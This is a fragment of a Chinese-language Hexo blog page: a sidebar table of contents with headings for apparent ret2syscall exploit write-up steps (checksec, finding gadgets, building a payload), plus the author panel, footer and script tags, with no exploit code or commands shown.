class="nav-number">4.0.0.1.2.</span> <span class="nav-text">静态分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%99%E8%84%9A%E6%9C%AC"><span class="nav-number">4.0.0.1.3.</span> <span class="nav-text">写脚本</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C"><span class="nav-number">4.0.0.1.4.</span> <span class="nav-text">运行</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Ret2Syscall"><span class="nav-number">5.</span> <span class="nav-text">Ret2Syscall</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%93%88%E5%90%89%E5%92%A9%E5%BE%97"><span class="nav-number">5.0.0.1.</span> <span class="nav-text">哈吉咩得</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#checksec-1"><span class="nav-number">5.0.0.1.1.</span> <span class="nav-text">checksec</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90-1"><span class="nav-number">5.0.0.1.2.</span> <span class="nav-text">静态分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%89%BE%E5%88%B0gadget%E5%9C%B0%E5%9D%80"><span class="nav-number">5.0.0.1.3.</span> <span class="nav-text">找到gadget地址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9E%84%E5%BB%BApayload"><span class="nav-number">5.0.0.1.4.</span> <span class="nav-text">构建payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A3%E7%A1%AE%E6%80%9D%E8%B7%AF-1"><span class="nav-number">5.0.0.2.</span> <span class="nav-text">正确思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AF%BB%E6%89%BE%E5%90%8E%E9%97%A8%E5%87%BD%E6%95%B0"><span class="nav-number">5.0.0.2.1.</span> <span class="nav-text">寻找后门函数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%89%BEgadget"><span class="nav-number">5.0.0.2.2.</span> <span class="nav-text">找gadget</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E5%B0%9D%E8%AF%95%E8%A6%86%E7%9B%96%E5%8E%9F%E6%9C%89%E8%BF%94%E5%9B%9E%E5%9C%B0%E5%9D%80"><span class="nav-number">5.0.0.2.3.</span> <span class="nav-text">动态调试尝试覆盖原有返回地址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9E%84%E5%BB%BApayload%EF%BC%8C%E7%BC%96%E5%86%99exp"><span class="nav-number">5.0.0.2.4.</span> <span class="nav-text">构建payload，编写exp</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Pocon</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pocon</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
